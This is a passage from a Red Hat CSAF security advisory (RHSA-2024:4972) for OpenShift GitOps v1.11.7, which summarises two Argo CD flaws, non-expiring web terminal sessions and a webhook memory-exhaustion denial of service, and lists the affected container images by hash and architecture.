"8Base-GitOps-1.13:openshift-gitops-1/argo-rollouts-rhel8@sha256:7a90a484902bfc7148217914cd65f0a1d7e79218a238abc479a6d9ccef96f4cf_s390x",
"8Base-GitOps-1.13:openshift-gitops-1/argocd-rhel8@sha256:343c542d45bf52fda4742183d60422d36c15615105f990a180fee0b15dcd82d0_ppc64le",
"8Base-GitOps-1.13:openshift-gitops-1/argocd-rhel8@sha256:65bcc82d88275ce84eb21c2a88a6f4d32bbb8c5e28d34e7de4ee19cc3dddedac_amd64",
"8Base-GitOps-1.13:openshift-gitops-1/argocd-rhel8@sha256:8738e84b087318aa8b9a3d2fa851e018897af0b646de58cde3be0861c3a2b3fd_s390x",
"8Base-GitOps-1.13:openshift-gitops-1/argocd-rhel8@sha256:8814381fb164cc04ff0764a45c4ab36bbf95c64950c6667e78ba3b7dbef85a57_arm64",
"8Base-GitOps-1.13:openshift-gitops-1/console-plugin-rhel8@sha256:01159dc5aad803a0812003320a9cca4b23a34e8b1d037dbe5437b064a41a5a33_arm64",
"8Base-GitOps-1.13:openshift-gitops-1/console-plugin-rhel8@sha256:5e2c4a47afa8f147b140abac309cdb1f6c92186170a0180f76acff3526557fde_ppc64le",
"8Base-GitOps-1.13:openshift-gitops-1/console-plugin-rhel8@sha256:a8399eae8d0e6810a1a340bb80df08ae49ff1c0eff4eea39c8c929ef5a5d6e37_amd64",
"8Base-GitOps-1.13:openshift-gitops-1/console-plugin-rhel8@sha256:f241386d6775eda56cc4965fc798b3c955c8ad37fbab5c0b9d2a047322df3c8c_s390x",
"8Base-GitOps-1.13:openshift-gitops-1/dex-rhel8@sha256:63625a8587f9836d55817fbefce372cf294ce5ed3c7d0c4ca1738762aef0b892_arm64",
"8Base-GitOps-1.13:openshift-gitops-1/dex-rhel8@sha256:7b5b7193324c2bf732cb5680b08344d80c6fc36f0994c7f672e8a494e02c5af6_s390x",
"8Base-GitOps-1.13:openshift-gitops-1/dex-rhel8@sha256:94a08e73f086c275689d3b0da814f7cda6f011a991db0aa1312d3f025d866924_ppc64le",
"8Base-GitOps-1.13:openshift-gitops-1/dex-rhel8@sha256:983356f0dbd9205281f335f3eb3fe2b6d9a82559d0329f622e3d309974fd7ef2_amd64",
"8Base-GitOps-1.13:openshift-gitops-1/gitops-operator-bundle@sha256:b19fb714784fa74033214d26a368ec13b26452772c0c0384c569c266392234bd_amd64",
"8Base-GitOps-1.13:openshift-gitops-1/gitops-rhel8-operator@sha256:25424a9311ba9557e8d07bb199a3bf4a341c5d86be36417728687b417c52cfbf_s390x",
"8Base-GitOps-1.13:openshift-gitops-1/gitops-rhel8-operator@sha256:26796accb8e20fc14ea607742a828818cfad7d32a390f71c6cd9ea8e20079f85_arm64",
"8Base-GitOps-1.13:openshift-gitops-1/gitops-rhel8-operator@sha256:738ad84244e4845d985d3f211f3bdc887b89ca562d54909042813c2291345ce2_amd64",
"8Base-GitOps-1.13:openshift-gitops-1/gitops-rhel8-operator@sha256:f010f82179b4081c06c367227211252b1cdcf664b90da44a0cba15e0000f110a_ppc64le",
"8Base-GitOps-1.13:openshift-gitops-1/gitops-rhel8@sha256:4b1708affdaeb5e9916da886b1fe9819e2ff05950e462ce34222a426e66a581e_s390x",
"8Base-GitOps-1.13:openshift-gitops-1/gitops-rhel8@sha256:ba0877e9ea66210a3a47d33369919e425b3e39879832d0425971af56b04da716_ppc64le",
"8Base-GitOps-1.13:openshift-gitops-1/gitops-rhel8@sha256:bda876b4b557ab3e1a0a9d422d784eeb8bd830cb988932eb9b0f6388631ad738_arm64",
"8Base-GitOps-1.13:openshift-gitops-1/gitops-rhel8@sha256:e36a69825f19867f5f455816f9aca377ae0572f32729ab035b66adce8bcef70c_amd64",
"8Base-GitOps-1.13:openshift-gitops-1/kam-delivery-rhel8@sha256:0c8ce44b0860558edb8e8cc27e9c54b92b34b6b3517f4f357455085eb3d9d30d_amd64",
"8Base-GitOps-1.13:openshift-gitops-1/kam-delivery-rhel8@sha256:731ef52b2be3f011a77d153740e3eac09f84e5098f7fbf78584c399d498a9f8d_arm64",
"8Base-GitOps-1.13:openshift-gitops-1/kam-delivery-rhel8@sha256:ca6139f39423508388f5f8493430113e343e41b4215560b48d7ccb088ab05f1a_ppc64le",
"8Base-GitOps-1.13:openshift-gitops-1/kam-delivery-rhel8@sha256:fe61e21f90bdfa11451947a3f4ab59adc0e9056414ffdfdfedf7ad79a94c617a_s390x",
"8Base-GitOps-1.13:openshift-gitops-1/must-gather-rhel8@sha256:5444ffeeeac5446b3212b06d99256e736048e876125fc65753ce6de9017c25fd_ppc64le",
"8Base-GitOps-1.13:openshift-gitops-1/must-gather-rhel8@sha256:a20821b1e70daa6d6c89d477584ef65ec421eb0e76a9fca6d00e74d2bed620ef_amd64",
"8Base-GitOps-1.13:openshift-gitops-1/must-gather-rhel8@sha256:bfb27b8b743b72b93a8e92db93a11a589ee17cdef2d94bdfeeda4c79a20862c4_arm64",
"8Base-GitOps-1.13:openshift-gitops-1/must-gather-rhel8@sha256:ed9f5f7d1db149ff01c4d545728008ee9c0eee77b1f5feede99b68ba8b56c0fa_s390x",
"9Base-GitOps-1.13:openshift-gitops-1/argocd-rhel9@sha256:3cfd0ec979b85445f44648d03118591e3c87f6502a33e27812955151151a9654_amd64",
"9Base-GitOps-1.13:openshift-gitops-1/argocd-rhel9@sha256:47bf94148d5c374326ebf24e0a5e5a2eefd57f8cd55611e1b9bca787d5690992_arm64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "argocd: Unauthenticated Denial of Service (DoS) Vulnerability via /api/webhook Endpoint in Argo CD"
}
]
}
RHSA-2024:4972
Vulnerability from csaf_redhat - Published: 2024-08-01 10:48 - Updated: 2026-03-18 16:23A flaw was found in Argo CD. Affected versions of Argo CD have a bug where open web terminal sessions do not expire. This bug allows users to send WebSocket messages even if the token has expired. The most straightforward scenario occurs when a user opens the terminal view and leaves it open for an extended period. This flaw allows users to view sensitive information even after logging out.
A vulnerability was found in Argo CD. This flaw allows an unauthenticated attacker to send a specially crafted large JSON payload to the /api/webhook endpoint, causing excessive memory allocation leading to service disruption by triggering an out-of-memory (OOM) kill. The issue poses a high risk to the availability of Argo CD deployments.
| URL | Category | ||||||||||||||||||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||||||||||||||||||||||||||||||||
{
"document": {
"aggregate_severity": {
"namespace": "https://access.redhat.com/security/updates/classification/",
"text": "Important"
},
"category": "csaf_security_advisory",
"csaf_version": "2.0",
"distribution": {
"text": "Copyright \u00a9 Red Hat, Inc. All rights reserved.",
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "en",
"notes": [
{
"category": "summary",
"text": "An update is now available for Red Hat OpenShift GitOps v1.11.7. Red Hat\nProduct Security has rated this update as having a security impact of Important.\nA Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.",
"title": "Topic"
},
{
"category": "general",
"text": "Errata Advisory for Red Hat OpenShift GitOps v1.11.7.\n\nSecurity Fix(es):\n\n* openshift-gitops-argocd-container: Unauthenticated Denial of Service (DoS) Vulnerability via /api/webhook Endpoint in Argo CD [gitops-1.11](CVE-2024-40634)\n* openshift-gitops-container: Argo CD web terminal session doesn\u0027t expire [gitops-1.11](CVE-2023-40025)\n\nFor more details about the security issue(s), including the impact, a CVSS\nscore, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.",
"title": "Details"
},
{
"category": "legal_disclaimer",
"text": "This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.",
"title": "Terms of Use"
}
],
"publisher": {
"category": "vendor",
"contact_details": "https://access.redhat.com/security/team/contact/",
"issuing_authority": "Red Hat Product Security is responsible for vulnerability handling across all Red Hat products and services.",
"name": "Red Hat Product Security",
"namespace": "https://www.redhat.com"
},
"references": [
{
"category": "self",
"summary": "https://access.redhat.com/errata/RHSA-2024:4972",
"url": "https://access.redhat.com/errata/RHSA-2024:4972"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/updates/classification/#important",
"url": "https://access.redhat.com/security/updates/classification/#important"
},
{
"category": "self",
"summary": "Canonical URL",
"url": "https://security.access.redhat.com/data/csaf/v2/advisories/2024/rhsa-2024_4972.json"
}
],
"title": "Red Hat Security Advisory: Errata Advisory for Red Hat OpenShift GitOps v1.11.7 security update",
"tracking": {
"current_release_date": "2026-03-18T16:23:51+00:00",
"generator": {
"date": "2026-03-18T16:23:51+00:00",
"engine": {
"name": "Red Hat SDEngine",
"version": "4.7.3"
}
},
"id": "RHSA-2024:4972",
"initial_release_date": "2024-08-01T10:48:26+00:00",
"revision_history": [
{
"date": "2024-08-01T10:48:26+00:00",
"number": "1",
"summary": "Initial version"
},
{
"date": "2024-08-01T10:48:26+00:00",
"number": "2",
"summary": "Last updated version"
},
{
"date": "2026-03-18T16:23:51+00:00",
"number": "3",
"summary": "Last generated version"
}
],
"status": "final",
"version": "3"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_name",
"name": "Red Hat OpenShift GitOps 1.11",
"product": {
"name": "Red Hat OpenShift GitOps 1.11",
"product_id": "8Base-GitOps-1.11",
"product_identification_helper": {
"cpe": "cpe:/a:redhat:openshift_gitops:1.11::el8"
}
}
}
],
"category": "product_family",
"name": "Red Hat OpenShift GitOps"
},
{
"branches": [
{
"category": "product_version",
"name": "openshift-gitops-1/argocd-rhel8@sha256:ea0181fdffaea17edf31b32830075f33e5bd7e5e951fb12c7734a3beb5fb6a12_amd64",
"product": {
"name": "openshift-gitops-1/argocd-rhel8@sha256:ea0181fdffaea17edf31b32830075f33e5bd7e5e951fb12c7734a3beb5fb6a12_amd64",
"product_id": "openshift-gitops-1/argocd-rhel8@sha256:ea0181fdffaea17edf31b32830075f33e5bd7e5e951fb12c7734a3beb5fb6a12_amd64",
"product_identification_helper": {
"purl": "pkg:oci/argocd-rhel8@sha256:ea0181fdffaea17edf31b32830075f33e5bd7e5e951fb12c7734a3beb5fb6a12?arch=amd64\u0026repository_url=registry.redhat.io/openshift-gitops-1/argocd-rhel8\u0026tag=v1.11.7-2"
}
}
},
{
"category": "product_version",
"name": "openshift-gitops-1/argo-rollouts-rhel8@sha256:9ae9beb8a3c1c4ace3f2c37d230416cf52426816105a3b9ea759bb5b7de5547a_amd64",
"product": {
"name": "openshift-gitops-1/argo-rollouts-rhel8@sha256:9ae9beb8a3c1c4ace3f2c37d230416cf52426816105a3b9ea759bb5b7de5547a_amd64",
"product_id": "openshift-gitops-1/argo-rollouts-rhel8@sha256:9ae9beb8a3c1c4ace3f2c37d230416cf52426816105a3b9ea759bb5b7de5547a_amd64",
"product_identification_helper": {
"purl": "pkg:oci/argo-rollouts-rhel8@sha256:9ae9beb8a3c1c4ace3f2c37d230416cf52426816105a3b9ea759bb5b7de5547a?arch=amd64\u0026repository_url=registry.redhat.io/openshift-gitops-1/argo-rollouts-rhel8\u0026tag=v1.11.7-2"
}
}
},
{
"category": "product_version",
"name": "openshift-gitops-1/console-plugin-rhel8@sha256:3f6354df560a086dd2d3d066bb316fa29b2f90409664352da5b4d5379b1bd59a_amd64",
"product": {
"name": "openshift-gitops-1/console-plugin-rhel8@sha256:3f6354df560a086dd2d3d066bb316fa29b2f90409664352da5b4d5379b1bd59a_amd64",
"product_id": "openshift-gitops-1/console-plugin-rhel8@sha256:3f6354df560a086dd2d3d066bb316fa29b2f90409664352da5b4d5379b1bd59a_amd64",
"product_identification_helper": {
"purl": "pkg:oci/console-plugin-rhel8@sha256:3f6354df560a086dd2d3d066bb316fa29b2f90409664352da5b4d5379b1bd59a?arch=amd64\u0026repository_url=registry.redhat.io/openshift-gitops-1/console-plugin-rhel8\u0026tag=v1.11.7-2"
}
}
},
{
"category": "product_version",
"name": "openshift-gitops-1/gitops-rhel8@sha256:5de8d57c81bc70b3112cd331dfa701f1bc995eba8568a1cf71c4390538efaf06_amd64",
"product": {
"name": "openshift-gitops-1/gitops-rhel8@sha256:5de8d57c81bc70b3112cd331dfa701f1bc995eba8568a1cf71c4390538efaf06_amd64",
"product_id": "openshift-gitops-1/gitops-rhel8@sha256:5de8d57c81bc70b3112cd331dfa701f1bc995eba8568a1cf71c4390538efaf06_amd64",
"product_identification_helper": {
"purl": "pkg:oci/gitops-rhel8@sha256:5de8d57c81bc70b3112cd331dfa701f1bc995eba8568a1cf71c4390538efaf06?arch=amd64\u0026repository_url=registry.redhat.io/openshift-gitops-1/gitops-rhel8\u0026tag=v1.11.7-2"
}
}
},
{
"category": "product_version",
"name": "openshift-gitops-1/dex-rhel8@sha256:07bd1d4c9625d632c25f9b26f5afab0a0b385a01ceda8262a20d63d9380363c0_amd64",
"product": {
"name": "openshift-gitops-1/dex-rhel8@sha256:07bd1d4c9625d632c25f9b26f5afab0a0b385a01ceda8262a20d63d9380363c0_amd64",
"product_id": "openshift-gitops-1/dex-rhel8@sha256:07bd1d4c9625d632c25f9b26f5afab0a0b385a01ceda8262a20d63d9380363c0_amd64",
"product_identification_helper": {
"purl": "pkg:oci/dex-rhel8@sha256:07bd1d4c9625d632c25f9b26f5afab0a0b385a01ceda8262a20d63d9380363c0?arch=amd64\u0026repository_url=registry.redhat.io/openshift-gitops-1/dex-rhel8\u0026tag=v1.11.7-2"
}
}
},
{
"category": "product_version",
"name": "openshift-gitops-1/kam-delivery-rhel8@sha256:dfd515876281d0eeffa51ad725bda5c48da3a9225f5e577e41a0aec58614a582_amd64",
"product": {
"name": "openshift-gitops-1/kam-delivery-rhel8@sha256:dfd515876281d0eeffa51ad725bda5c48da3a9225f5e577e41a0aec58614a582_amd64",
"product_id": "openshift-gitops-1/kam-delivery-rhel8@sha256:dfd515876281d0eeffa51ad725bda5c48da3a9225f5e577e41a0aec58614a582_amd64",
"product_identification_helper": {
"purl": "pkg:oci/kam-delivery-rhel8@sha256:dfd515876281d0eeffa51ad725bda5c48da3a9225f5e577e41a0aec58614a582?arch=amd64\u0026repository_url=registry.redhat.io/openshift-gitops-1/kam-delivery-rhel8\u0026tag=v1.11.7-2"
}
}
},
{
"category": "product_version",
"name": "openshift-gitops-1/must-gather-rhel8@sha256:68edbdcbd72a6ccf7d07d04e148227673ad34c8add04d9ab4770f4bbf3937974_amd64",
"product": {
"name": "openshift-gitops-1/must-gather-rhel8@sha256:68edbdcbd72a6ccf7d07d04e148227673ad34c8add04d9ab4770f4bbf3937974_amd64",
"product_id": "openshift-gitops-1/must-gather-rhel8@sha256:68edbdcbd72a6ccf7d07d04e148227673ad34c8add04d9ab4770f4bbf3937974_amd64",
"product_identification_helper": {
"purl": "pkg:oci/must-gather-rhel8@sha256:68edbdcbd72a6ccf7d07d04e148227673ad34c8add04d9ab4770f4bbf3937974?arch=amd64\u0026repository_url=registry.redhat.io/openshift-gitops-1/must-gather-rhel8\u0026tag=v1.11.7-2"
}
}
},
{
"category": "product_version",
"name": "openshift-gitops-1/gitops-operator-bundle@sha256:8d786bb519f9caa8c56b5a1de9bbfa92161f697644329114af3af5f324797787_amd64",
"product": {
"name": "openshift-gitops-1/gitops-operator-bundle@sha256:8d786bb519f9caa8c56b5a1de9bbfa92161f697644329114af3af5f324797787_amd64",
"product_id": "openshift-gitops-1/gitops-operator-bundle@sha256:8d786bb519f9caa8c56b5a1de9bbfa92161f697644329114af3af5f324797787_amd64",
"product_identification_helper": {
"purl": "pkg:oci/gitops-operator-bundle@sha256:8d786bb519f9caa8c56b5a1de9bbfa92161f697644329114af3af5f324797787?arch=amd64\u0026repository_url=registry.redhat.io/openshift-gitops-1/gitops-operator-bundle\u0026tag=v1.11.7-2"
}
}
},
{
"category": "product_version",
"name": "openshift-gitops-1/gitops-rhel8-operator@sha256:2da7b90a1c514f1d86d90b6f546c26480377d6f752deca9ae6bc3d23ff3bb991_amd64",
"product": {
"name": "openshift-gitops-1/gitops-rhel8-operator@sha256:2da7b90a1c514f1d86d90b6f546c26480377d6f752deca9ae6bc3d23ff3bb991_amd64",
"product_id": "openshift-gitops-1/gitops-rhel8-operator@sha256:2da7b90a1c514f1d86d90b6f546c26480377d6f752deca9ae6bc3d23ff3bb991_amd64",
"product_identification_helper": {
"purl": "pkg:oci/gitops-rhel8-operator@sha256:2da7b90a1c514f1d86d90b6f546c26480377d6f752deca9ae6bc3d23ff3bb991?arch=amd64\u0026repository_url=registry.redhat.io/openshift-gitops-1/gitops-rhel8-operator\u0026tag=v1.11.7-2"
}
}
}
],
"category": "architecture",
"name": "amd64"
},
{
"branches": [
{
"category": "product_version",
"name": "openshift-gitops-1/argocd-rhel8@sha256:fb0f944ef8c85fdd51e9d4ffa785217436989bb9388935392b9743f6c0157fb4_arm64",
"product": {
"name": "openshift-gitops-1/argocd-rhel8@sha256:fb0f944ef8c85fdd51e9d4ffa785217436989bb9388935392b9743f6c0157fb4_arm64",
"product_id": "openshift-gitops-1/argocd-rhel8@sha256:fb0f944ef8c85fdd51e9d4ffa785217436989bb9388935392b9743f6c0157fb4_arm64",
"product_identification_helper": {
"purl": "pkg:oci/argocd-rhel8@sha256:fb0f944ef8c85fdd51e9d4ffa785217436989bb9388935392b9743f6c0157fb4?arch=arm64\u0026repository_url=registry.redhat.io/openshift-gitops-1/argocd-rhel8\u0026tag=v1.11.7-2"
}
}
},
{
"category": "product_version",
"name": "openshift-gitops-1/argo-rollouts-rhel8@sha256:5b5783216e793d74aad31abaa18e644f21ce645e736c6e4faaf061c51ffced18_arm64",
"product": {
"name": "openshift-gitops-1/argo-rollouts-rhel8@sha256:5b5783216e793d74aad31abaa18e644f21ce645e736c6e4faaf061c51ffced18_arm64",
"product_id": "openshift-gitops-1/argo-rollouts-rhel8@sha256:5b5783216e793d74aad31abaa18e644f21ce645e736c6e4faaf061c51ffced18_arm64",
"product_identification_helper": {
"purl": "pkg:oci/argo-rollouts-rhel8@sha256:5b5783216e793d74aad31abaa18e644f21ce645e736c6e4faaf061c51ffced18?arch=arm64\u0026repository_url=registry.redhat.io/openshift-gitops-1/argo-rollouts-rhel8\u0026tag=v1.11.7-2"
}
}
},
{
"category": "product_version",
"name": "openshift-gitops-1/console-plugin-rhel8@sha256:b059fed1e6cbdfa744ca40f63eebd7852918e60f6e63a56e6c4c8b47cfb7297a_arm64",
"product": {
"name": "openshift-gitops-1/console-plugin-rhel8@sha256:b059fed1e6cbdfa744ca40f63eebd7852918e60f6e63a56e6c4c8b47cfb7297a_arm64",
"product_id": "openshift-gitops-1/console-plugin-rhel8@sha256:b059fed1e6cbdfa744ca40f63eebd7852918e60f6e63a56e6c4c8b47cfb7297a_arm64",
"product_identification_helper": {
"purl": "pkg:oci/console-plugin-rhel8@sha256:b059fed1e6cbdfa744ca40f63eebd7852918e60f6e63a56e6c4c8b47cfb7297a?arch=arm64\u0026repository_url=registry.redhat.io/openshift-gitops-1/console-plugin-rhel8\u0026tag=v1.11.7-2"
}
}
},
{
"category": "product_version",
"name": "openshift-gitops-1/gitops-rhel8@sha256:f26223d724c39de4b86d1abf3db446b38fdcd7231323f8ffe34a11f2a4db033c_arm64",
"product": {
"name": "openshift-gitops-1/gitops-rhel8@sha256:f26223d724c39de4b86d1abf3db446b38fdcd7231323f8ffe34a11f2a4db033c_arm64",
"product_id": "openshift-gitops-1/gitops-rhel8@sha256:f26223d724c39de4b86d1abf3db446b38fdcd7231323f8ffe34a11f2a4db033c_arm64",
"product_identification_helper": {
"purl": "pkg:oci/gitops-rhel8@sha256:f26223d724c39de4b86d1abf3db446b38fdcd7231323f8ffe34a11f2a4db033c?arch=arm64\u0026repository_url=registry.redhat.io/openshift-gitops-1/gitops-rhel8\u0026tag=v1.11.7-2"
}
}
},
{
"category": "product_version",
"name": "openshift-gitops-1/dex-rhel8@sha256:c6339f1ca0a031eedc1f77755f84c10bc096603c62e4d41266c1f57c723a5fe8_arm64",
"product": {
"name": "openshift-gitops-1/dex-rhel8@sha256:c6339f1ca0a031eedc1f77755f84c10bc096603c62e4d41266c1f57c723a5fe8_arm64",
"product_id": "openshift-gitops-1/dex-rhel8@sha256:c6339f1ca0a031eedc1f77755f84c10bc096603c62e4d41266c1f57c723a5fe8_arm64",
"product_identification_helper": {
"purl": "pkg:oci/dex-rhel8@sha256:c6339f1ca0a031eedc1f77755f84c10bc096603c62e4d41266c1f57c723a5fe8?arch=arm64\u0026repository_url=registry.redhat.io/openshift-gitops-1/dex-rhel8\u0026tag=v1.11.7-2"
}
}
},
{
"category": "product_version",
"name": "openshift-gitops-1/kam-delivery-rhel8@sha256:71532e658e81a9daeb5d84c29851a56b8fe1b20f7a38bd3783002d0f3f611272_arm64",
"product": {
"name": "openshift-gitops-1/kam-delivery-rhel8@sha256:71532e658e81a9daeb5d84c29851a56b8fe1b20f7a38bd3783002d0f3f611272_arm64",
"product_id": "openshift-gitops-1/kam-delivery-rhel8@sha256:71532e658e81a9daeb5d84c29851a56b8fe1b20f7a38bd3783002d0f3f611272_arm64",
"product_identification_helper": {
"purl": "pkg:oci/kam-delivery-rhel8@sha256:71532e658e81a9daeb5d84c29851a56b8fe1b20f7a38bd3783002d0f3f611272?arch=arm64\u0026repository_url=registry.redhat.io/openshift-gitops-1/kam-delivery-rhel8\u0026tag=v1.11.7-2"
}
}
},
{
"category": "product_version",
"name": "openshift-gitops-1/must-gather-rhel8@sha256:3b669408440a2e15c285e62c20656198c7f0caecc04d2f10b4abcc649fddf887_arm64",
"product": {
"name": "openshift-gitops-1/must-gather-rhel8@sha256:3b669408440a2e15c285e62c20656198c7f0caecc04d2f10b4abcc649fddf887_arm64",
"product_id": "openshift-gitops-1/must-gather-rhel8@sha256:3b669408440a2e15c285e62c20656198c7f0caecc04d2f10b4abcc649fddf887_arm64",
"product_identification_helper": {
"purl": "pkg:oci/must-gather-rhel8@sha256:3b669408440a2e15c285e62c20656198c7f0caecc04d2f10b4abcc649fddf887?arch=arm64\u0026repository_url=registry.redhat.io/openshift-gitops-1/must-gather-rhel8\u0026tag=v1.11.7-2"
}
}
},
{
"category": "product_version",
"name": "openshift-gitops-1/gitops-rhel8-operator@sha256:7eed2ed5c7db8a702917e5f989a4742be3d0e63dc41a3ac6e2dd9d8a2ef586ec_arm64",
"product": {
"name": "openshift-gitops-1/gitops-rhel8-operator@sha256:7eed2ed5c7db8a702917e5f989a4742be3d0e63dc41a3ac6e2dd9d8a2ef586ec_arm64",
"product_id": "openshift-gitops-1/gitops-rhel8-operator@sha256:7eed2ed5c7db8a702917e5f989a4742be3d0e63dc41a3ac6e2dd9d8a2ef586ec_arm64",
"product_identification_helper": {
"purl": "pkg:oci/gitops-rhel8-operator@sha256:7eed2ed5c7db8a702917e5f989a4742be3d0e63dc41a3ac6e2dd9d8a2ef586ec?arch=arm64\u0026repository_url=registry.redhat.io/openshift-gitops-1/gitops-rhel8-operator\u0026tag=v1.11.7-2"
}
}
}
],
"category": "architecture",
"name": "arm64"
},
{
"branches": [
{
"category": "product_version",
"name": "openshift-gitops-1/argocd-rhel8@sha256:f209de3c136c821251fb8e892250c79ab47c02bc7b4f773b280aeef9acacbe41_s390x",
"product": {
"name": "openshift-gitops-1/argocd-rhel8@sha256:f209de3c136c821251fb8e892250c79ab47c02bc7b4f773b280aeef9acacbe41_s390x",
"product_id": "openshift-gitops-1/argocd-rhel8@sha256:f209de3c136c821251fb8e892250c79ab47c02bc7b4f773b280aeef9acacbe41_s390x",
"product_identification_helper": {
"purl": "pkg:oci/argocd-rhel8@sha256:f209de3c136c821251fb8e892250c79ab47c02bc7b4f773b280aeef9acacbe41?arch=s390x\u0026repository_url=registry.redhat.io/openshift-gitops-1/argocd-rhel8\u0026tag=v1.11.7-2"
}
}
},
{
"category": "product_version",
"name": "openshift-gitops-1/argo-rollouts-rhel8@sha256:31fadc4e401db9f7af9d06100dba0999525940a1ccb256dd0befcfd80f427c90_s390x",
"product": {
"name": "openshift-gitops-1/argo-rollouts-rhel8@sha256:31fadc4e401db9f7af9d06100dba0999525940a1ccb256dd0befcfd80f427c90_s390x",
"product_id": "openshift-gitops-1/argo-rollouts-rhel8@sha256:31fadc4e401db9f7af9d06100dba0999525940a1ccb256dd0befcfd80f427c90_s390x",
"product_identification_helper": {
"purl": "pkg:oci/argo-rollouts-rhel8@sha256:31fadc4e401db9f7af9d06100dba0999525940a1ccb256dd0befcfd80f427c90?arch=s390x\u0026repository_url=registry.redhat.io/openshift-gitops-1/argo-rollouts-rhel8\u0026tag=v1.11.7-2"
}
}
},
{
"category": "product_version",
"name": "openshift-gitops-1/console-plugin-rhel8@sha256:bef56e9030b779020fd4d424af1c4da8bcdf46a89d1d5505cacda5aba17b3f5f_s390x",
"product": {
"name": "openshift-gitops-1/console-plugin-rhel8@sha256:bef56e9030b779020fd4d424af1c4da8bcdf46a89d1d5505cacda5aba17b3f5f_s390x",
"product_id": "openshift-gitops-1/console-plugin-rhel8@sha256:bef56e9030b779020fd4d424af1c4da8bcdf46a89d1d5505cacda5aba17b3f5f_s390x",
"product_identification_helper": {
"purl": "pkg:oci/console-plugin-rhel8@sha256:bef56e9030b779020fd4d424af1c4da8bcdf46a89d1d5505cacda5aba17b3f5f?arch=s390x\u0026repository_url=registry.redhat.io/openshift-gitops-1/console-plugin-rhel8\u0026tag=v1.11.7-2"
}
}
},
{
"category": "product_version",
"name": "openshift-gitops-1/gitops-rhel8@sha256:3adcc88984e8c288ecd8a0ae3b3a3dbf6e6d9260432bc934772060bd4d477d70_s390x",
"product": {
"name": "openshift-gitops-1/gitops-rhel8@sha256:3adcc88984e8c288ecd8a0ae3b3a3dbf6e6d9260432bc934772060bd4d477d70_s390x",
"product_id": "openshift-gitops-1/gitops-rhel8@sha256:3adcc88984e8c288ecd8a0ae3b3a3dbf6e6d9260432bc934772060bd4d477d70_s390x",
"product_identification_helper": {
"purl": "pkg:oci/gitops-rhel8@sha256:3adcc88984e8c288ecd8a0ae3b3a3dbf6e6d9260432bc934772060bd4d477d70?arch=s390x\u0026repository_url=registry.redhat.io/openshift-gitops-1/gitops-rhel8\u0026tag=v1.11.7-2"
}
}
},
{
"category": "product_version",
"name": "openshift-gitops-1/dex-rhel8@sha256:d668d7dd535b8bd007d6d9c667a847aadd4184e60bff23c13710034d99b4cb78_s390x",
"product": {
"name": "openshift-gitops-1/dex-rhel8@sha256:d668d7dd535b8bd007d6d9c667a847aadd4184e60bff23c13710034d99b4cb78_s390x",
"product_id": "openshift-gitops-1/dex-rhel8@sha256:d668d7dd535b8bd007d6d9c667a847aadd4184e60bff23c13710034d99b4cb78_s390x",
"product_identification_helper": {
"purl": "pkg:oci/dex-rhel8@sha256:d668d7dd535b8bd007d6d9c667a847aadd4184e60bff23c13710034d99b4cb78?arch=s390x\u0026repository_url=registry.redhat.io/openshift-gitops-1/dex-rhel8\u0026tag=v1.11.7-2"
}
}
},
{
"category": "product_version",
"name": "openshift-gitops-1/kam-delivery-rhel8@sha256:f69026a41ac59c45855de3575b70fe94821f74686abf92125f9d0ef28918db9d_s390x",
"product": {
"name": "openshift-gitops-1/kam-delivery-rhel8@sha256:f69026a41ac59c45855de3575b70fe94821f74686abf92125f9d0ef28918db9d_s390x",
"product_id": "openshift-gitops-1/kam-delivery-rhel8@sha256:f69026a41ac59c45855de3575b70fe94821f74686abf92125f9d0ef28918db9d_s390x",
"product_identification_helper": {
"purl": "pkg:oci/kam-delivery-rhel8@sha256:f69026a41ac59c45855de3575b70fe94821f74686abf92125f9d0ef28918db9d?arch=s390x\u0026repository_url=registry.redhat.io/openshift-gitops-1/kam-delivery-rhel8\u0026tag=v1.11.7-2"
}
}
},
{
"category": "product_version",
"name": "openshift-gitops-1/must-gather-rhel8@sha256:1f066935b3a9de1add896aa3c17da8918afd418669bb541a25b27708dd9752cd_s390x",
"product": {
"name": "openshift-gitops-1/must-gather-rhel8@sha256:1f066935b3a9de1add896aa3c17da8918afd418669bb541a25b27708dd9752cd_s390x",
"product_id": "openshift-gitops-1/must-gather-rhel8@sha256:1f066935b3a9de1add896aa3c17da8918afd418669bb541a25b27708dd9752cd_s390x",
"product_identification_helper": {
"purl": "pkg:oci/must-gather-rhel8@sha256:1f066935b3a9de1add896aa3c17da8918afd418669bb541a25b27708dd9752cd?arch=s390x\u0026repository_url=registry.redhat.io/openshift-gitops-1/must-gather-rhel8\u0026tag=v1.11.7-2"
}
}
},
{
"category": "product_version",
"name": "openshift-gitops-1/gitops-rhel8-operator@sha256:16c13cf844a266006ca6242a13be9e5d3a1f57b561fbc0eb4fd22914a0297913_s390x",
"product": {
"name": "openshift-gitops-1/gitops-rhel8-operator@sha256:16c13cf844a266006ca6242a13be9e5d3a1f57b561fbc0eb4fd22914a0297913_s390x",
"product_id": "openshift-gitops-1/gitops-rhel8-operator@sha256:16c13cf844a266006ca6242a13be9e5d3a1f57b561fbc0eb4fd22914a0297913_s390x",
"product_identification_helper": {
"purl": "pkg:oci/gitops-rhel8-operator@sha256:16c13cf844a266006ca6242a13be9e5d3a1f57b561fbc0eb4fd22914a0297913?arch=s390x\u0026repository_url=registry.redhat.io/openshift-gitops-1/gitops-rhel8-operator\u0026tag=v1.11.7-2"
}
}
}
],
"category": "architecture",
"name": "s390x"
},
{
"branches": [
{
"category": "product_version",
"name": "openshift-gitops-1/argocd-rhel8@sha256:dbd4a26ceb74570bb3d3b4b9ef911f6d8c14c2affdd4627fcf666bdbf88b922b_ppc64le",
"product": {
"name": "openshift-gitops-1/argocd-rhel8@sha256:dbd4a26ceb74570bb3d3b4b9ef911f6d8c14c2affdd4627fcf666bdbf88b922b_ppc64le",
